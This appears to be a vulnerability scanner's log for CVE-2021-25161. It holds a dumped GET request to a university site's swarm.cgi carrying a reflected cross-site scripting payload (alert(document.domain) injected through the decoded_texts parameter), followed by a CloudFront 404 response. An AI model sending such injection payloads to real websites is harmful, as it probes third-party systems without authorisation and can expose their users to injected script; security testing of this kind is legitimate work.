[CVE-2021-25161] Dumped HTTP request for https://www.vcrc.esrc.unimelb.edu.au/swarm.cgi?opcode=cp_preview&bg_color=AA&banner_color=B&banner_text=AAA&terms_of_use=AAA&use_policy=BBB&authenticated=False&decoded_texts="%27;%0Aalert(document.domain);//%0a%27


GET /swarm.cgi?opcode=cp_preview&bg_color=AA&banner_color=B&banner_text=AAA&terms_of_use=AAA&use_policy=BBB&authenticated=False&decoded_texts="%27;%0Aalert(document.domain);//%0a%27 HTTP/1.1
Host: www.vcrc.esrc.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


[CVE-2021-25161] Dumped HTTP response https://www.vcrc.esrc.unimelb.edu.au/swarm.cgi?opcode=cp_preview&bg_color=AA&banner_color=B&banner_text=AAA&terms_of_use=AAA&use_policy=BBB&authenticated=False&decoded_texts="%27;%0Aalert(document.domain);//%0a%27

HTTP/1.1 404 Not Found
Connection: close
Content-Length: 536
Age: 26
Content-Type: text/html; charset=utf-8
Date: Wed, 06 Aug 2025 15:18:35 GMT
Server: AmazonS3
Via: 1.1 edc9e8add41b7fdb36486f4cca170748.cloudfront.net (CloudFront)
X-Amz-Cf-Id: hPbTn_tnsCG6gY9VrqH3hTprUICydyygLrz3tUX5x1o6LTGXX1wH-A==
X-Amz-Cf-Pop: IAD61-P5
X-Cache: Error from cloudfront

<html>
<head><title>404 Not Found</title></head>
<body>
<h1>404 Not Found</h1>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: 404.html</li>
<li>RequestId: NNKKEBMP0W6SP27V</li>
<li>HostId: JpZMqLDXQJjEbc3dt1D9LokHwoJ0KK0gAK1e+saqPFqCb0YjXtn3CdWBE1Z7v8U+nzX4rzxIz5g=</li>
</ul>
<h3>An Error Occurred While Attempting to Retrieve a Custom Error Document</h3>
<ul>
<li>Code: NoSuchKey</li>
<li>Message: The specified key does not exist.</li>
<li>Key: error.html</li>
</ul>
<hr/>
</body>
</html>

